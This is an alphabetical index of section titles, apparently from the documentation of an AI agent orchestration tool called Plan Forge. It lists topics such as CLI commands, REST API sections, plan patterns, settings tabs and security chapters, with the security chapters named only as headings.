Lifecycle Hooks — Writing a custom hook

Lifecycle Hooks Reference — all eight hooks

Ch F · LiveGuard Alert Runbooks

List of Figures

Ch P · List of Figures

LiveGuard Alert Runbooks

LiveGuard Env Tab

LiveGuard Health Tab

LiveGuard Incidents Tab

LiveGuard MCP Tools

LiveGuard Security Tab

Ch 17 · LiveGuard Tools Reference

LiveGuard Tools Reference

LiveGuard Triage Tab

M

Make This Yours - Tailoring Flow (Stakeholder Briefing)

Ch 11 · MCP Server & Tools

MCP Server — Quick Start

MCP Server — Reference

MCP Server & Tools

MCP Server Architecture

Ch 11 · MCP Server & Tools

MCP Server Chapter Overview

Ch 11 · MCP Server & Tools

MCP Server Selection (Plan Forge / GitHub / Foundry Toolbox)

MCP Tools 69 Categories

Ch 21 · Memory Architecture

Memory Architecture

Microsoft Foundry Composition Variant

Model Routing

Multi-Agent Quorum Turns PFORGE_QUORUM_TURN

Multi-Agent Setup

Multi-Agent Setup

Multi-Team Operations (Federated vs Centralized)

N

Nested Subagents

Network and Isolation Patterns (Cloud / Hybrid / Air-Gapped)

O

Observability Export (OTel)

One-Click Install

OpenBrain Memory

OpenBrain: The Connective Tissue

OTLP Telemetry Traces

P

Parallel Execution [P] tag

Parallel Execution DAG

pforge analyze

pforge check

pforge diagnose

pforge diff

pforge ext

pforge init

pforge run-plan

pforge smith

pforge smith Verification

pforge status

pforge sweep

pforge update

Pick Your Preset

Pipeline Agents

Pipeline Agents Click-Through

Plan Execution Fails

Plan Forge for Enterprise

Ch I · Plan Forge on the GitHub Stack

Plan Forge on the GitHub Stack

Plan Pattern Library

Plan Pattern P1 — Add an Entity (DB → service → API → UI)

Plan Pattern P10 — Performance Fix (benchmark-driven)

Plan Pattern P11 — Security Patch (CVE / vulnerability)

Plan Pattern P12 — Documentation Phase (one slice per document)

Plan Pattern P13 — CI/CD Workflow Change (no-op + promote)

Plan Pattern P14 — Spike-Then-Build (time-boxed exploration)

Plan Pattern P2 — Add an Endpoint (new route on existing entity)

Plan Pattern P3 — Add an External Integration (third-party API)

Plan Pattern P4 — Refactor a Subsystem (multi-consumer migration)

Plan Pattern P5 — Fix a Regression (strict red-green-refactor)

Plan Pattern P6 — Hotfix (minimal-surface emergency change)

Plan Pattern P7 — Feature Flag Rollout (ship dark, toggle later)

Plan Pattern P8 — Data Migration (additive + backfill + verify)

Plan Pattern P9 — Dependency Upgrade (per-module fix slices)

Plan Patterns — Anti-patterns (mega-slice, test-after, etc.)

Plan Patterns — Composing patterns across phases

Plan Patterns — Index of 14 patterns (when, slice count)

Plan Structure

Plans Are Markdown

Pre-flight Check (Quickstart)

Prerequisites

Progress Tab

Project History

Project Principles

Project Profile

Publishing Extensions

Ch B · Quick Reference Card

Q

Quick Reference Card

Quick Start for Evaluators

Quorum Complexity Scoring Rubric

Quorum Mode

Quorum Mode in Practice (Day in the Forge)

Quorum Quality Examples - 3 Models vs 1

Quorum vs Quorum Advisory

R

Reader-Journey Ladders — Pick Your Path

Reading the Hardened Plan

Replay Tab

REST API — Authentication, binding, and CORS

REST API — Bridge and approvals

REST API — Copilot integration

REST API — Cost

REST API — Crucible (idea smelting)

REST API — Discovery (well-known, capabilities, version, status)

REST API — Error response shape

REST API — Forge-Master (conversational entrypoint)

REST API — Generic MCP dispatcher (POST /api/tool/:name)

REST API — GitHub and team coordination

REST API — Image generation

REST API — Inner loop (reviewer calibration, gate suggestions)

REST API — LiveGuard (drift, incidents, deploys, secret scan)

REST API — Memory (L1/L2/L3)

REST API — Notifications, audit, dashboard, settings

REST API — Orientation (16 subsystems, 113 endpoints)

REST API — Plan execution and runs

REST API — Quorum and fix proposals

REST API — Search, timeline, hub

REST API — Skills (decision tray)

REST API — Tempering and bugs

REST API — Worked Examples (curl, wscat, SDK)

REST API Endpoints

REST API Reference

Resume and Retry

Review & Ship

Reviewer or Architect Ladder (Reader Paths)

Runs Tab

S

Sample Project

Ch E · Sample Project

Scaling the Factory Across Teams

SDK for Integrators

Security — AI-specific threats (prompt injection, untrusted tool output, scope escape)

Security — Attack surface enumeration

Security — Hardening checklist (12 controls)

Security — Incident response (LiveGuard front door)

Security — Orientation (developer-machine-first posture)

Security — Prompt injection defenses

Security — Sandboxing & gate execution (TCB boundary)

Security — Scope escape (drift detection, Review Gate)

Security — Secret management (env, .forge/secrets.json, gh auth)

Security — STRIDE per subsystem

Security — Supply chain (Plan Forge itself, extensions, providers)

Security — Trust boundaries (6 boundaries)

Security — Untrusted tool output defenses

Security & Threat Model

Self-Deterministic Loop (Deep Dive)

Sessions and Why They Matter

Settings API Keys Tab

Settings Brain Tab

Settings Bridge Tab

Settings Crucible Tab

Settings Execution Tab

Settings General Tab

Settings Memory Tab

Settings Models Tab

Settings Updates Tab

Setup Failed

Setup Wizard

Ship (Quickstart)

Skills — Authoring a New Skill

Skills — Events Emitted by the Runner

Skills — Shared Skills (every preset)

Skills — SKILL.md Runtime Contract

Skills — Stack-Specific Skills (per language)

Skills — Three Ways to Invoke

Skills Slash Commands

Skills Tab

Slice Boundaries Matter More Than You Think

Slices Gates and Scope

Slicing Strategy

Solo Developer Ladder (Reader Paths)

Spec Kit Ecosystem Extensions

Spec Kit Interop

Spec Kit Import Flow

Spec Kit Interop

Spec Kit Import Procedure

Spec Kit Interop

Specify the Feature (Quickstart)

Stack-Specific Agents

Ch C · Stack-Specific Notes

Stack-Specific Notes

Stakeholder Briefing — the 10-minute white paper

Starting the Dashboard

Starting the MCP Server

Step 0 Specify the Feature

Step 2 Harden the Plan

Step 3 — Route Agents to Lanes

Step 3 Execute

Step 5 Review

Stop Conditions

Studio Classification Badge

Studio Quorum Advisory

Studio Session Persistence

Sweep for Deferred Work (Quickstart)

Ch 27 · Team Coordination

T

Team Coordination

Team Lead Ladder (Reader Paths)

Tempering MCP Tools

Testbed MCP Tools

The .NET A/B Test — 99 vs 44 (Day in the Forge)

The 7-Step Pipeline

The 80/20 Wall

The Blacksmith Analogy

The Bug Registry

Ch 23 · The Bug Registry

The Competitive Loop (Deep Dive)

The Compounding Flywheel (Stakeholder Briefing)

Ch 26 · The Copilot Integration Trilogy

The Copilot Integration Trilogy

The Dashboard

The File System

The Five Ladders at a Glance (Reader Paths)

The Four Cost Levers (Stakeholder Briefing)

The Four New Pieces (Hallmark, Anvil, Lattice, sync_memories)

The Four-Station Shop (Foreword)

Ch 28 · The Knowledge Graph

The Inner Loop (Deep Dive)

The Knowledge Graph

The LiveGuard Dashboard

Ch 18 · The LiveGuard Dashboard

The Loop That Never Ends (Day in the Forge)

The One-Paragraph Version (Foreword)

The Problem in One Sentence

Ch 20 · The Remote Bridge

The Remote Bridge

The Testbed

Ch 24 · The Testbed

The Watcher

Ch 19 · The Watcher

Three Memory Commands You Can Run Today

Three Vignettes at a Glance (Day in the Forge)

Three-Lane Triage Funnel

Audit Loop (Deep Dive)

Timeline Tab

Traces Tab OTLP

Troubleshooting

Troubleshooting — Errors & Exit Codes quick reference

Two-Layer Guardrail Model

Typical MCP Workflow

Ch Q · Unified API Surface Index

U

Unified API Surface Index

Unified Memory Across Agents

Ch 21 · Memory Architecture

Universal Instruction Files

Ch 10 · Instruction Files & Agents

Update Source Modes

Ch G · Update Source Modes

Updating Plan Forge

V

v1.0 Foundation

v2.0 Autonomous

v2.10 OpenClaw

v2.14 GitHub Copilot Integration

v2.18 Temper Guards

v2.5 Quorum Mode

v2.83 Host-Aware Routing

v2.95 Lattice / Code-Graph

v3.0 Copilot Trilogy

v3.2–3.4 Team Mode

v3.6 OpenBrain L3 (current)

Validation Gates

Verify MCP Server Running

Verify with pforge smith

W

Watcher MCP Tools

Watcher Tab

WebSocket Hub Events

Week 12 — Full Fleet Quarterly Review

Week 4 — Pilot Graduation

What Changed (and What Did Not)

What GitHub Leaves to the Ecosystem

What GitHub Ships (the Substrate)

What Happens Without Guardrails

Ch 16 · What Is LiveGuard?

What Is LiveGuard?

What Is Plan Forge?

What Plan Forge Does

What Plan Forge Is and Is Not (Stakeholder Briefing)

What the Three Vignettes Share (Day in the Forge)

What This Book Is Not (Foreword)

What This Is Not

What We Add You Didn't Ask For (Stakeholder Briefing)

Whats Next After Quickstart

When Two Ladders Apply (Reader Paths)

Where to Find What You Need (Enterprise)

Who This Is For

Why Cheaper Models Punch Above Their Weight

Why Open Source Matters (Stakeholder Briefing)

Why Plan Forge for the Enterprise

Why Session Isolation Works

Windsurf Setup

Worked Example - Copilot CLI + Grok API

Writing a Good Scope Contract

Writing Plans That Work

Y

Your First Plan

Your First Plan